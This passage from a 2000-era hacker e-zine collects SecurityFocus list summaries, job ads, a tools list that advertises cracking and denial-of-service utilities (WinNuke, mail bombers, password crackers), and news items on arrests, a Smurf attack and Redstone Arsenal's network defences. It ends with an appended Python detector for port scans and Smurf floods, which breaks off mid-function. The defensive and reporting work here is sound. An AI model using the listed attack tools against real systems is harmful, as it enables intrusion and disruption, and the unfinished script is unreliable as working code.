
11. source port 321 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com

12. Korea (again) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net

13. BOGUS.IvCD File (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com

14. port 768 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz

15. Extrange named messages (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti

16. Probes to tcp 2766 ('System V Listner') (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org

17. Possible attempt at hacking? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au

18. DNS update queries: another sort of suspicious activity. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg

VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30
----------------------------------------------------------

1. Shadow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu

2. things to break.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com

3. HTTP scanners? (summary, long) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com

4. CGI insecurities (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net

5. ICQ Pass Cracker. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au

6. File Share Vacuum (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no

7. IIS4.0 .htw vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com

8. Napster a little insecure? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br

9. distributed.net and seti@home (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net

VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------------

Seeking Employment:

1. Prashant Vijay (Summer Internship)
Resume at:
http://www.securityfocus.com/templates/archive.pike?list=77&msg=NDBBJEJEALCFECNEOEHPMEKBCAAA.vijay@eecs.tulane.edu&part=.1

Seeking Staff:

1. Security Research Engineer (Atlanta, Ga)
Reply to: Samuel Cure
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000124212259.7741.qmail@securityfocus.com

2. Practice Manager w/PKI experience (NYC, Philly or DC)
Reply to: Erik Voss
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=00d201bf6832$f9cd5460$6775010a@saratoga3

3. Lead Security Engineer - Bay Area/San Jose
Reply to: Sanjeev Kumar
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127015859.1308.qmail@securityfocus.com

4. Senior security engineers - Bay Area/San Jose
Reply to: Erik Voss
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127020135.1478.qmail@securityfocus.com

5. Virus coder wanted (San Antonio, TX)
Reply to: Drissel, James W.
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil

6.
Junior Security Engineers Needed (Maryland)
Reply to: Brian Mitchell
Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=NCBBKIMIMKKMLDMGEHFKAEAKENAA.bmitchell@icscorp.com

VIII. SECURITY SURVEY 2000-01-24 to 2000-01-30
----------------------------------------------

Our current month long survey is:

"Do you think security vendors exaggerate the importance of security issues as a marketing strategy?"

  Never    6% / 10 votes
  Rarely  30% / 48 votes
  Often   47% / 74 votes
  Always  14% / 23 votes

Total number of votes: 155 votes

IX. SECURITY FOCUS TOP 6 TOOLS 2000-01-24 to 2000-01-30
--------------------------------------------------------

1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
by RedShadow
Relevant URL: http://www.rsh.kiev.ua

Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner, Tracert, Telnet, Nslookup, Finger, Echo, Time, UPD test, File Info, Compare File, Netstat, SysInfo, Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info

Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack (definitions of the password by a method of search), Unix password Crack, Finger over SendMail, Buffer Overflow, Smb Password Check, CRK Files

ShadowPortGuard - code for detection of connection on the certain port

Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x

And many other functions

2. SecurityFocus.com Pager (Win95/98/NT)
by SecurityFocus.com
Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip

This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable).

3. lidentd 1.0p1 (Linux)
by Drago, drago@drago.com
Relevant URL: http://www.securityfocus.com/data/tools/lidentd-v1.0p1.tgz

lidentd is an identd replacement with many features including fake users, random fake users, restricted fake user responses, matching against the passwd file for fake responses and more.

4. Cgi Sonar 1.0 (any system supporting perl)
by M.e.s.s.i.a.h
Relevant URL: http://www.securityfocus.com/data/tools/CgiSonar.pl.gz

5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS)
by Craig Rowland, crowland@psionic.com
Relevant URL: http://www.securityfocus.com/data/tools/logcheck-1.1.1.tar.gz

Logcheck is part of the Abacus Project of security tools. It is a program created to help in the processing of UNIX system logfiles generated by the various Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper and Log Daemon packages, and the Firewall Toolkit by Trusted Information Systems Inc. (TIS). Logcheck also works very well at reporting on other common operating system security violations and strange events.

6. Secret Sharer 1.0 (Windows 95/98)
by Joel McNamara, joelm@eskimo.com
Relevant URL: http://www.securityfocus.com/data/tools/secs.zip

Secret Sharer is designed to help people keep secure back-up copies of sensitive data such as PGP (or other cryptosystem) passphrases and confidential files.

X. SPONSOR INFORMATION - CORE SDI
------------------------------------------

CORE SDI is an international computer security research and development company. Its clients include 3 of the Big 5 chartered accountant firms, for whom CORE SDI develops customized security auditing tools, as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services, CORE also performs risk assessment and security infrastructure consulting for a large number of government and Fortune 500 companies in both North and Latin America.
URL: http://www.core-sdi.com

XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------

1. How do I subscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBSCRIBE SF-NEWS Lastname, Firstname

You will receive a confirmation request message to which you will have to answer.

2. How do I unsubscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of:

  UNSUBSCRIBE SF-NEWS

If your email address has changed, email aleph1@securityfocus.com and I will manually remove you.

3. How do I disable mail delivery temporarily?

If you are simply going on vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command:

  SET SF-NEWS NOMAIL

To turn e-mail delivery back on use the command:

  SET SF-NEWS MAIL

4. Is the list available in a digest format?

Yes. The digest is generated once a day.

5. How do I subscribe to the digest?

To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with a message body of:

  SET SF-NEWS DIGEST

6. How do I unsubscribe from the digest?

To turn the digest off send a message to LISTSERV with a message body of:

  SET SF-NEWS NODIGEST

If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.

7. I seem to not be able to unsubscribe. What is going on?

You are probably subscribed from a different address than that from which you are sending commands to LISTSERV. Either send email from the appropriate address or email the moderator to be unsubscribed manually.

@HWA

35.0 HNN: Jan 17: NY Student Arrested After Damaging School Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A high school student in Long Island, New York has been arrested for electronically breaking into his school's computer system.
He has been charged with computer tampering and unauthorized use of a computer. Police say that he was caught after bragging about the intrusion to friends and teachers. Damage was estimated at $3,000.

WABC News
http://abcnews.go.com/local/wabc/news/32275_1142000.html

High School Hacker Arrested

Long Island authorities have arrested a 17-year-old high school student for hacking into his school district's computer. Suffolk County authorities are charging Keith Billig with computer tampering and unauthorized use of a computer. Billig is a student at Hauppauge High School.

On Wednesday, authorities say Billig gained access to the school district's mainframe computer. He allegedly was able to attain the password of every administrator, teacher and student in the district. The computer's internal security system was able to detect Billig's intrusion in the early stages.

Police say Billig's bragging about his exploits to teachers and other students is what led them to him. Authorities are not sure what Billig's motive for breaking into the computer system was. Authorities estimate the damage done to the school district's computer system at $3,000.

@HWA

Where do these guys get these figures from? Any sysadmin worth his salt can secure the system in less than an hour... do they get paid $3k/hr down there?? - Ed

36.0 HNN: Jan 17: NSA Wants A Secure Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Benjamin

The NSA has contracted Secure Computing as a sole source provider for a new Linux based secure OS. Secure Computing will integrate its patented Type Enforcement technology, which it uses for the Sidewinder firewall, at the OS level. The technology is scheduled to be made available to the public as well as the NSA.
PR Newswire - via Yahoo http://biz.yahoo.com/prnews/000113/ca_secure__1.html Thursday January 13, 8:02 am Eastern Time Company Press Release SOURCE: Secure Computing Corporation National Security Agency Selects Secure Computing to Provide Type Enforcement(TM) on Linux OS Secure Computing First to Develop Strong Security Platform for Linux SAN JOSE, Calif., Jan. 13 /PRNewswire/ -- Secure Computing Corporation (Nasdaq: SCUR - news), today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications. The NSA is the nation's high-technology cryptologic organization that ensures important and sensitive activities in the US intelligence community are protected from exploitation through interception, unauthorized access, or related technical intelligence threats. Secure Computing's patented Type Enforcement technology provides network security protection that is unique to the industry. This technology, first developed under previous government contracts, is available today as part of the UNIX OS for Secure Computing's Sidewinder(TM) firewall. Type Enforcement secures underlying operating systems and protects applications and network services, by segmenting them into domains. Each domain is granted permission to access only specific file types, including executables. As such, each domain provides a self-contained, discrete layer of protection that cannot be altered. Implementing Type Enforcement within the operating system itself assures the highest level of security available in commercial operating systems. 
"The NSA has been a long standing customer and partner of Secure Computing," said Chris Filo, vice president and general manager of the Advanced Technology Division at Secure Computing. "Working with the NSA allows Secure to continue to advance the state of the art in security technologies that is required to enable safe, secure operating environments within the Department of Defense (DoD), while at the same time, providing the basis for our future commercial products."

Linux is a UNIX-type operating system that includes true multitasking, virtual memory, shared libraries, demand loading, proper memory management, TCP/IP networking, and other features consistent with Unix-type systems. The Linux source code is freely available to everyone.

About the National Security Agency

The National Security Agency (NSA) is the nation's cryptologic organization, tasked with making and breaking codes and ciphers. NSA is a high-technology organization, working on the very frontiers of communications and data processing. The expertise and knowledge it develops provide the government with systems that deny foreign powers knowledge of US capabilities and intentions.

The NSA is charged with two of the most important and sensitive activities in the US intelligence community. The information systems security or INFOSEC mission provides leadership, products, and services to protect classified and unclassified national security systems against exploitation through interception, unauthorized access, or related technical intelligence threats. The second activity is the foreign signals intelligence or SIGINT mission, which allows for an effective, unified organization and control of all the foreign signals collection and processing activities of the United States.

About Secure Computing

Headquartered in San Jose, California, Secure Computing Corporation is a global leader in providing safe, secure extranets for e-business.
Secure Computing solutions provide authentication, authorization and secure network access. Secure Computing's worldwide partners and customer base are counted among the Fortune 50 in financial services, healthcare, telecom, communications, manufacturing, technology and Internet service providers, as well as some of the largest agencies of the United States government. For more information, visit Secure Computing Corporation at www.securecomputing.com, or by calling: in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440; in the U.S., 800-379-4944, or 408-918-6100.

NOTE: All trademarks, tradenames or service marks used or mentioned herein belong to their respective owners.

This press release contains forward-looking statements relating to the anticipated delivery of Secure Computing's Type Enforcement technology on the Linux operating system and the expected benefits of such technology, and such statements involve a number of risks and uncertainties. Among the important factors that could cause actual results to differ materially from those indicated by such forward-looking statements are delays in product development, competitive pressures, technical difficulties, changes in customer requirements, general economic conditions and the risk factors detailed from time to time in Secure Computing's periodic reports and registration statements filed with the Securities and Exchange Commission.

SOURCE: Secure Computing Corporation

@HWA

37.0 HNN: Jan 17: Cryptome may be breaking the law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Cryptome May Be Violating the Law

contributed by White Vampire
Leading Internet civil liberties groups said today that new encryption export regulations released by the U.S. Commerce Department fall short of the Clinton Administration's promise to deregulate the privacy-enhancing technology.
One example of this concerns the popular Internet site Cryptome where PGP is made freely available to anyone in the world who wants it. It is unclear with the new regulations whether this is a criminal act or not.

Wired
http://www.wired.com/news/politics/0,1283,33672,00.html

Is This Man a Crypto Criminal?
by Declan McCullagh
3:00 a.m. 15.Jan.2000 PST

Crypto maven John Young has a problem. He may be a felon, guilty of a federal crime punishable by years in prison. Or he may not be. He'd just like to know one way or another.

The 63-year-old architect and owner of the popular Cryptome site has posted a copy of PGP (Pretty Good Privacy) encryption software for the world to download.

PGP, an encryption program that lets users scramble files and email, has become one of the most popular crypto applications online. But people living outside the US have not been able to get it legally from a US Web site.

Young's seemingly innocuous act might violate new US government regulations that restrict placing privacy-protecting crypto programs on the Web. Therein lies the uncertainty.

The rules are much less onerous than the previous version, but they still apply. And they're so labyrinthine and convoluted that even lawyers who specialize in the area declined to guess whether or not Young has run afoul of President Clinton's executive order and Commerce Department regulations.

"The fact that questions still remain about what does and does not violate the law demonstrates that these regulations continue to cloud the situation," said David Sobel, general counsel of the Electronic Privacy Information Center.

So Young decided to be intrepid -- and perhaps risk a confrontation with the Feds.

"If it's not right, someone will tell me. If I go to a lawyer to ask, they'll advise caution. Every time I go to a lawyer they advise me not to do it, so I don't go any more," he said.
The Department of Commerce, which published the regulations and is in charge of arresting crypto-miscreants, declined to comment. Eugene Cottilli, a spokesman for the Commerce's bureau of export administration, could not secure an official response from government lawyers on Friday.

Complicating matters is the different way that the regulations treat ready-to-use binary software, and the human-readable source code that must be compiled to be used.

On Friday, Young posted a copy of PGP Freeware Version 6.5.2a for Windows and Macintosh, which contains binary code. The regulations appear to say that Americans can only distribute it online if the government has previously "reviewed and classified" the software as acceptable for distribution.

Under the old rules, Web sites could distribute binary code only if they checked the Internet address of the recipient and attempted to verify that it was a computer inside the US. MIT, which makes PGP available, has a system that does just that.

But Young's site doesn't include the foreigner-verification check, and he said overseas visitors have already been downloading the software.

The uncertainty -- and possibility of criminal prosecution -- doesn't faze Young. "People are saying the regs are deliberately vague so you'll censor yourself, so I tend to go the other way," he said. "I'm hoping this will lead to clarification."

Source code, on the other hand, is a bit freer. As long as it's not subject to an onerous license and as long as you email the site's address to the Commerce Department, Web posting appears to be permitted. Some cryptographers have already done just that.

"I'm willing to give it a try," wrote cryptographer Wei Dai on an encryption mailing list. "I sent an email to BXA [Bureau of Export Administration] and got no reply. The rules do not say I need permission, just notification, so Crypto++ is now available for unrestricted download."
Dai maintains the Crypto++ library of C++ encryption routines, including authentication programs and ciphers.

Soon after, the text of the Electronic Frontier Foundation's Cracking DES book appeared online.
http://www.shmoo.com/crypto/Cracking_DES

@HWA

38.0 HNN: Jan 21: H4g1s Member Sentenced to Six Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by extension
Jason Mewhiney, the Canadian who defaced a NASA web page back in 1997, has been sentenced to 6 months in prison and ordered to pay a $6000 fine. Mewhiney pleaded guilty to 12 of the 51 charges against him, including committing mischief to data stored and fraudulent use of a NASA computer system. NASA estimated the damages caused by the intrusion at $70,000. (And how much did it cost to prosecute the case?)

Canadian Press - via Yahoo
http://ca.dailynews.yahoo.com/ca/headlines/cpress/tc/story.html?s=v/ca/cpress/20000118/tc/technology_461022_1.html

Monday January 17 11:48 PM ET

Man sentenced to six months in jail after pleading guilty to computer hacking

SUDBURY, Ont. (CP) - A man was sentenced to six months in jail and fined $6,000 Monday after pleading guilty to computer hacking related charges, including altering NASA's Web site.

Jason Mewhiney, 22, went into the space agency's Web site March 5, 1997, leaving a message that called for an end to the commercialization of the Internet and freedom for two hackers in jail for computer crimes.

Justice John Poupore compared Mewhiney's actions to that of a "safecracker" trying to steal money from a bank.

"Mr. Mewhiney, you ought not to leave this courtroom with a badge of honour in the computer community," the judge said Monday. "You sir, are a convicted criminal. That is a distinction you will carry with you for the rest of your life. It is nothing to be proud of."
Mewhiney, of Val Caron, outside of Sudbury, pleaded guilty to 12 of the 51 charges he was facing, including committing mischief to data stored and fraudulent use of a NASA computer system.

He was able to access dozens of computer systems by using programs that crack password codes.

The space agency's home page was put briefly out of service for repair, at an estimated cost of $70,000.

NASA and FBI computer crime teams caught Mewhiney by tracing his movements.

Mewhiney told the court he was sorry. "I'd just like to say I'm sorry and I'm sorry for everyone's time I've wasted," he said.

RCMP searched his parents' home in the spring of 1998 and found a paper with numerous computer system passwords on it.

The judge agreed to a request by assistant Crown attorney Patricia Moore that Mewhiney's computer and other papers seized by police be confiscated. One of his probation conditions was that he not possess a computer.

(Sudbury Star)

© The Canadian Press, 2000

@HWA

39.0 HNN: Jan 21: Smurf Attack Felt Across the Country
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dark Knight
A small ISP in Seattle WA, Oz.net, suffered a major Smurf attack last weekend that was felt across the country. The denial of service attack is estimated to have been launched from 2000 systems nationwide. 70% of the traffic in the Washington State area was said to have been affected.

MSNBC
http://www.msnbc.com/local/KING/483728.asp

404 my dr00gies, sorry article unavailable...

@HWA

40.0 HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
CIHost.com, a web hosting company based in Texas, left over 1500 customer records available on the internet for anyone with a web browser to read.
CIHost said that the database had been moved to a server so an outside developer could have access to the information and by mistake password protection was omitted. The customer records included information such as name, credit card type, credit card number, and the amount charged.

MSNBC
http://www.msnbc.com/news/360102.asp

(fuck MSNBC and their bullshit page design)

@HWA

41.0 HNN: Jan 21: False Bids Submitted, Hackers Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
False bids on an online auction for a dinosaur skeleton have been blamed on 'hackers'. False bids of up to $15 million were submitted by people with names such as 'stevebert' and 'dumbass507'. The bidding procedure has been revamped to prevent this from occurring again, however no details were given as to exactly what security measures were put in place. (It is amazing how many different definitions of the word 'hacker' exist)

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_608000/608634.stm

Tuesday, 18 January, 2000, 17:52 GMT

Hackers attack dinosaur auction

[Photo caption: Dinosaur hunters with their quarry: Alan Detrich (left) and Fred Nuss]

By BBC News Online's Damian Carrington

An online auction for a complete Tyrannosaurus rex skeleton was attacked by malicious hackers on Tuesday who filed 17 false bids.

At least six of these made it through security measures specifically put in place to prevent such action.

"Some people found a way around that process and they have been removed," confirmed Brian Payea, public relations manager for Lycos. He told BBC News Online: "There are no valid bids so far."

Bank chat

The first attempt to auction the 11-metre fossil dinosaur on eBay was scuppered by prank bids of up to $8m.

However, this time, the new auctioneers Lycos Auction had teamed up with the website millionaire.com to try to verify the wealth of bidders before they made their offer.
Mr Payea described what should have happened: "You fill in a form, that is sent to millionaire.com and they review it and have a conversation with your bank. The approval is given and someone can bid."

However, hackers named "mrmanson20", "stevebert" and "dumbass507" found a hole and posted bids of up to $15m, well over the reserve price of $5.8m.

No credit compromise

Mr Payea declined to give details of what happened: "How the whole process works is proprietary and I'm not going into detail about it. But we are very confident it couldn't be done again."

He added that: "The hiccup does not compromise anybody's credit information - that is all encrypted and very secure."

The auction opened on Monday but Mr Payea was not concerned that no verified bids had yet been received: "It takes at least 24 hours for the approval process to be completed. In any case, I think it will take people a little while to commit to that kind of purchase - if it was me, I'd be having a chat with an accountant or two before I bid."

Million dollar bones

Even the reserve price may appear high but in 1997 a T. rex was bought for $8.36m by the Field Museum in Chicago, US.

The deal on this skeleton does include delivery from its current home in a Kansas warehouse. However, the bones are only partly exposed from the rock blocks in which they were found.

The 65 million-year-old fossil was discovered on a South Dakota cattle ranch in 1992. Owner Alan Detrich says he sees nothing wrong with auctioning off a piece of the Earth's history.

After all, he said, he spent more than $250,000 of his own money unearthing the dinosaur. And he will give 10% of the proceeds to the owners of the cattle ranch where the rock-encased skeleton was found, he says.

"This auction is open to the world. If we don't have the right to (sell the fossil), then we don't live in America. If we didn't go there and get him, he'd still be up there."

Mr Detrich added that he does not mind if his T. rex becomes a corporate mascot or is sold to a private collector with no intention of displaying it publicly.

Chuck Schaff, at the Museum of Comparative Zoology at Harvard University, said the fossil would be ideal for drawing crowds to a museum, but was probably too expensive for most.

"It's not unethical to sell it, it's just a shame it goes to the highest bidder," Mr Schaff says. "Some specimens do get away from scientists, but that's life. It's sad, though."

The auction, which began on Monday, is due to close at 0100 GMT on 11 February 2000.

@HWA

42.0 HNN: Jan 21: UK to create cyber force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest
The UK National Criminal Intelligence Service (NCIS) has been assigned £337,000 to draw up plans for establishing a cyber crime squad. This online cyber force will be used to combat online fraud, money laundering, distributing pornography and information about pedophilia, and electronic intrusions.

The Guardian Unlimited
http://www.newsunlimited.co.uk/uk_news/story/0,3604,123365,00.html

'Cyberforce' to fight online crime

Monday January 17, 2000

A national "cyberforce" of computer specialists is to be established by the home office to police the internet and combat a rising tide of online crime.

It was confirmed last night that the home secretary, Jack Straw, has assigned £337,000 to the UK National Criminal Intelligence Service (NCIS) to draw up plans for establishing a squad to counter criminal activity on the web.

The move, which will target those using computers for fraud, money laundering, distributing pornography and information about paedophilia, and hacking, follows a three-year NCIS study of internet crime which concluded that illegal activity on the web, from email viruses to cyber-stalking, is increasing as the wired population grows.

Operation Trawler highlighted the inadequacies of anti-computer crime units, leading to calls for a dedicated organisation.
The new unit is expected to include experts in the private sector, the Inland Revenue and police. It will also draw on resources available through links with MI5 and GCHQ - the government agency that eavesdrops on Britain and the world's communications networks.

Roger Gaspar, the director of intelligence at NCIS, and David Phillips, the chief constable of Kent and head of the crime committee at the Association of Chief Police Officers are drawing up plans for the unit, which will also make use of links with American intelligence organisations and the FBI.

Barry McIntyre

@HWA

43.0 HNN: Jan 21: Army Holds Off Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
System Administrators at Redstone Arsenal in Alabama are proud that they withstood the Y2K onslaught of cyber intruders. However, they go on to admit that in the past three months Redstone has been hit with 17 denial of service attacks of which twelve succeeded, and that they have had three web sites breached in the last year. (The interesting part of this article is at the end where the administrator admits that his network has a single point of failure.)

Government Executive Magazine
http://www.govexec.com/dailyfed/0100/012100j1.htm

January 21, 2000

DAILY BRIEFING

Army outpost held off hackers in New Year's showdown

By Joshua Dean
jdean@govexec.com

Shortly after dark on New Year's Day, the pager on the belt of Steve Carey, chief of information assurance at the Army's Redstone Arsenal in Alabama, went off. The message was alarming: a hacker was trying to crack into a critical server that keeps track of network identities and passwords at the arsenal.

When Carey got to the arsenal's network management center, he found the system protections had withstood the attack and all was well.

But Carey and his staff couldn't rest. Attackers continued trying to breach the arsenal's computers and its Web sites as the new millennium dawned.
Some other government sites were spared attacks during the New Year's holiday, even though they had braced for the worst. But Redstone is a particularly attractive target for high-tech bandits. The arsenal has technical information on 14 of the Army's top 29 weapons systems, including missiles, helicopters and conventional aircraft. It also handles about 63 percent of the Army's foreign military sales. This means transfers of money as well as weapons technology.

"It's big bucks," said Col. Douglas S. Brouillette, who heads the arsenal's Intelligence and Security Directorate.

As a result, security experts in Redstone's Local Computer Incident Response Team (LCIRT) are constantly vigilant and in many ways ahead of other agencies when it comes to handling network attacks. LCIRT uses a number of computer intrusion detection systems.

But even places such as Redstone, where computer security is a high priority, can't get all the technology resources they need. So instead of relying entirely on technology, the arsenal depends on people to remain alert against attacks.

"We have a high level of monitoring because we don't have all the firewalls we need installed yet. We hope the monitoring compensates for that," Brouillette said. "Monitoring allows us to detect, immediately react and fix attacks until we get all the firewalls and other security products installed."

Redstone's basic defense is to find attacks quickly in order to stop them as they happen, he said. Contract analysts from Intergraph Federal Systems serve with Carey on his defense team.

Redstone needs all the help it can get, because its networks are peppered with attacks daily. "We've had hundreds of incidents in the last three-month period," Brouillette said. "That's 3,000 to 4,000 scans of the network."

Hackers conduct scans to try to find out what hardware and software are present on a given network. Scans can discover computers or even modems with open links to the Internet.
Unknown hackers who appeared to be from countries including Bulgaria, China, Hungary, Israel, Latvia, Lithuania, Macedonia, Poland, Portugal, Romania and Russia have scanned Redstone over the past three months. But because hackers can make it look as if they were on a computer in a different country, pinning them down geographically is an imperfect science.

Once the reconnoitering is complete, hackers try to exploit vulnerabilities and gain access to private networks and the information stored there. Without intrusion detection systems and expertise, network staff may never know they've been hacked.

Beyond scanning and attempted break-in, hackers can cripple networks and servers by launching "denial-of-service" attacks. In such incidents, intruders launch a flood of messages to a single server, overwhelming it. Denial of service attacks have become so commonplace that they come with colorful names, such as Ping Flood, SMURF, SYN Flood, UDP Bomb and WinNuke.

Over the past three months Redstone has been hit with 17 denial of service attacks. Twelve of them succeeded.

And then there are the vandals—Internet gang members armed with digital spray paint—that LCIRT must contend with. "Three of our Web sites have been breached in the past 12 months," Carey said.

In the successful attacks, the methods were new to the network defenders, which meant the attackers were able to change the Web sites. Once LCIRT members discovered how the hackers pulled off the attacks, they went through every base Web server to make sure vulnerabilities were fixed.

Because of past vigilance, the New Year's vandals failed to make a dent. LCIRT members say new attacks and techniques are constantly appearing, and the only way to stop them is to have a team monitoring the network and the logs of the intrusion detection systems. That's how the arsenal's defenders knew the New Year's hackers were aiming deliberately for one of Redstone's most sensitive servers.
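The Oz.net item (39.0) and the Redstone piece above both turn on the same thing: a team watching the wire for scans and for Smurf-style floods. The script below is an added example of what that monitoring looks like in code; it is not from Oz.net, Redstone's LCIRT or HNN. It runs over a constructed list of one-line packet summaries ("<seconds> <proto> <src> <dst> <detail>", with echo-request/echo-reply for ICMP and "<dport>/<flags>" for TCP), and the local prefix and thresholds are made-up tuning values. It flags the two sides of a Smurf (your LAN being used as the amplifier, or one of your hosts being the victim) and the port scans that usually come first.

```python
"""Detectors for the traffic patterns named above: scans, Smurf, reply floods.

Added example; not code from Oz.net, Redstone's LCIRT or HNN. Input is a
constructed list of one-line packet summaries in the form
"<seconds> <proto> <src> <dst> <detail>", where <detail> is echo-request or
echo-reply for icmp and "<dport>/<flags>" for tcp. LOCAL_NETS and the
thresholds are made-up tuning values a site would adjust.
"""
import ipaddress
from collections import defaultdict

LOCAL_NETS = [ipaddress.ip_network("192.168.1.0/24")]  # assumed site prefix
SCAN_PORTS = 10      # distinct TCP ports from one source to one host => scan
REPLY_SOURCES = 20   # distinct sources replying to one host => reflected flood


def parse(line):
    """Split one constructed packet summary into a dict."""
    ts, proto, src, dst, detail = line.split()
    return {"ts": float(ts), "proto": proto, "src": src, "dst": dst, "detail": detail}


def is_directed_broadcast(addr):
    """True when addr is the broadcast address of one of our own prefixes."""
    ip = ipaddress.ip_address(addr)
    return any(ip == net.broadcast_address for net in LOCAL_NETS)


def amplifier_abuse(records):
    """Echo requests aimed at our broadcast address mean our LAN is being used
    as a Smurf amplifier; the (spoofed) source address is the real victim.
    Returns {claimed_source: request_count}."""
    hits = defaultdict(int)
    for r in records:
        if (r["proto"] == "icmp" and r["detail"] == "echo-request"
                and is_directed_broadcast(r["dst"])):
            hits[r["src"]] += 1
    return dict(hits)


def reply_floods(records, threshold=REPLY_SOURCES):
    """Echo replies converging on one host from many sources: that host is on
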